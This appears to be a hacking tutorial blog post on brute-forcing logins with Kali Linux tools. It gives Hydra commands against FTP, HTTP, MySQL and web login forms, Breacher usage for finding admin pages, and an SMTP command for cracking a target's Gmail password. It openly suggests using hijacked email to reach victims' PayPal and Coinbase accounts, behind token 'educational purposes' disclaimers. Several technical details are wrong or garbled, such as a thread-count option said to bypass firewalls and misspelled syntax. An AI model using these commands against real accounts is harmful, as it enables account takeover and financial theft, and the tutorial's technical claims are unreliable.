It is type of Cyber Attack in which we guess the (username) or (password), we use a word-list to find the login username and password. We can perform brute force attack on a specific service of a website or network like SSH, MYSQL, TCP, UDP, or on the main (login page) of website.
We can also perform brute force attack on Gmail, PayPal account, coin base account etc. to find (username) and (password). It is very dangerous attack for hacker and victim both can face problem. So, we must use it for security purposes only.
Many tools of kali Linux are used for this purpose like hydra, medusa, legion, Sparta etc. but in our post we will discuss main and important tool of kali Linux.
a) HYDRA:
Hydra is a very useful software that is used for brute force attack on different services and ports of a website. It is also used to do brute force attack on Gmail and system. It provides us password of a website, Gmail and system. It is not too large tool it is very simple and easy to use so a hacker must learn it for brute force attack. It provides the username and password of specific link of website to login to the website. It is pre-installed in kali Linux so we can use it directly.
Now we will see the main command of hydra with different option to perform a brute force attack on a specific service and port of website on which the specific service is running.
TO SEE ALL THE OPTIONS OF HYDRA:
(hydra -h)
A) BRUTE FORCE ATTACK ON DIFFERENT SERVICES OF WEBSITE
TO PERFORM SIMPLE BRUTE FORCE ATTACK ON A SERVICE:
(hydra + service://+ip address of website :+ port of service -L + path of username list -P path of password list) e.g.
(hydra ftp://192.168.2.8 : 21 -L /root/Desktop/usernames.txt -P /root/Desktop/pass.txt)
TO PERFORM BRUTE FORCE ATTACK ON A KNOWN USER:
(hydra + service://+ip address :+ port -l +username -P path of password list) e.g.
(hydra http://192.168.2.8 : 80 -l admin -P /root/Desktop/pass.txt)
TO SEE ATTACK DETAIL:
(hydra + service://+ip address of website : + port -L + username list -P + path of password list -v) e.g.
(hydra https://192.168.2.8 : 8080 -L /root/Desktop/usernames.txt -P /root/Desktop/pass.txt -v) e.g.
TO SAVE OUTPUT USERNAME AND PASSWORD IN FILE:
(hydra + service://+ip address of website :+port -L + username list -P password list -o + file path to save) e.g.
(hydra mysql://192.168.2.8 : 2122 -L /root/Desktop/usernames.txt -P /root/Desktop/pass.txt -o /root/Desktop/output.txt)
TO STOP HYDRA SOON AFTER FINDING USERNAME AND PASSWORD:
(hydra + service://+ip address of website :+port -L + username list -P password list -o + file name to save -f -v) e.g.
(hydra tcp://192.168.2.8 : 24 -L /root/Desktop/usernames.txt -P /root/Desktop/pass.txt -o /root/Desktop/login.txt -f -v)
TO BYPASS THE FIREWALL DURING BRUTE FORCE ATTACK:
(hydra + service://+ip address of website :+port -L + username list -P password list -o + output file name to save -f -v -t + no. of attacks per time) e.g.
(hydra tcp://192.168.2.8 : 24 -L /root/Desktop/usernames.txt -P /root/Desktop/pass.txt -o /root/Desktop/login.txt -f -v -t 4)
TO TRY NO OR BLANK PASSWORD FOR ON ATTACK:
(hydra + service://+ip address of website :+port -L + username list –e –n –o +output filename -f -v -t + no) e.g.
(hydra ftp://192.168.2.8 : 21 -L /root/Desktop/usernames.txt -e n -o /root/Desktop/outpit.txt -f -v -t 4)
TO PERFORM BRUTE FORCE ATTACK ON A SERVICE USING LIST HAVING USERNAME SEPARATED FROM PASSWORD BY CLONE AS (ADMIN : NIMDA):
(hydra + service://+ip :+port -C + password list -o + output file path -v -f -t + no. of attacks per time) e.g.
(hydra ftp://192.168.2.8 : 21 -C /root/Desktop/usepass.txt -o /root/Desktop/output.txt -v -f -t 4)
B) BRUTE FORCE ATTACK ON THE LOGIN PAGE OF WEBSITE BY HYDRA:
During website hacking the login username and password of a website is very important for hacker to take the full control of website. For this purpose hydra can be used.
First of all find the admin login page of a website as shown in figure.
Admin login Page of website
We can find the admin login page by using (BREACHER) tool of kali Linux.
BREACHER:
It is not a tool, but it is a python script that is used to find the (admin login page) of a website. It is too small but very useful script of python.
According to my opinion it is the very fast script that you must we use hacking a specific website.
Access mean to control a website and to access a website we need its (username) and (password) but before username and password we need the (login page) of website to enter the username and password to access the website.
So, Breacher is very important during web hacking and you must use it for easy working. We can install in our kali Linux using following command;
(git clone https://GitHub.com/s0md3v/breacher.git)
Then open the (breacher) folder. Here you will see a (breacher.py). open terminal here following commands of breacher.
TO SEE ALL OPTIONS OF BREACHER:
(python breacher.py -h)
TO FIND THE LOGIN PAGE OF A WEBSITE:
(python breacher.py -u + link of website --fast) e.g.
(python -u http://vulnweb.com/ --fast)
After running this command (admin login page or links) will be show in terminal with (green star) as shown in figure. Login page may be single and may be multiple.
In case of multiple pages you can try different.
Breacher is trying to find login page of website
Then (right click) on the box of (username) and click on (inspect) to check the variable from of username as (username). Then (right click) on the box of (password) and click on (inspect) and check the variable from password as (password).
Then check the (request form). To check this enter the incorrect username and incorrect password in login page and if (username) and (password) is not showing in (URL) or (login link) then it means request from is (post).
Also find the (login) variable for by same method as (loginBtn) but if (username) and (password) is showing (url) or (login link) then it means it is (get) request form.
Login credentials in hydra
Then check the (invalid massage) when you input the wrong username and password as (wrong credentials).
Let consider that our (login page) is
(198.162.0.8/login.php) and we want to perform brute force attack on it.
So run this command in hydra.
(hydra + login page ip or link + request from “/login from after link or ip address :+ username variable = ^USER^ & password variable = ^PASS^ & loginbtn = submit : invalid message -L + username list -P + password list -v -f -t + no. of attacks per time -o + output file) e.g.
(hydra 192.168.8.1 http-post-from “/login.php : username= ^USER^ & pcpassword = ^PASS^ & loginBtn =submit : wrong credentials.” -L /root/Desktop/users.txt -P /root/Desktop/pass.txt -v -f -t 4 -o /root/Desktop/output.txt)
After running this command hydra will provide you the username and password of login page of website and you can control the website.
Username and password found in hydra for website
C) BRUTE FORCE ATTACK ON GMAIL ACCOUNT BY HYDRA:
Gmail works on SMTP service. Since hydra attack on different services so we can also find the password of our target Gmail account by performing brute force attack on smtp service. Gmail is very sensitive contact method of a person. Gmail hacking is not allowed. So, I am telling you for educational purposes. You must try it on Gmail of fake websites, sexy websites, Devil Person. By hacking Gmail account you can hand over the coin base, paypal and other money accounts of your target person but I am telling you for only and only educational purposes. So, do not try it for wrong purposes otherwise you can arrest.
To find the password of Gmail account of your target run the following command.
(hydra smtp.gmail.com smtp -l + Gmail account -p + path of password list -s + port of gmail service -S -v -V) e.g.
(hydra smtp.gmail.com -l hackthissite243@gmail.com -P /root/Desktop/pass.txt/ -s 465 -S -v -V)
Password of target Gmail in hydra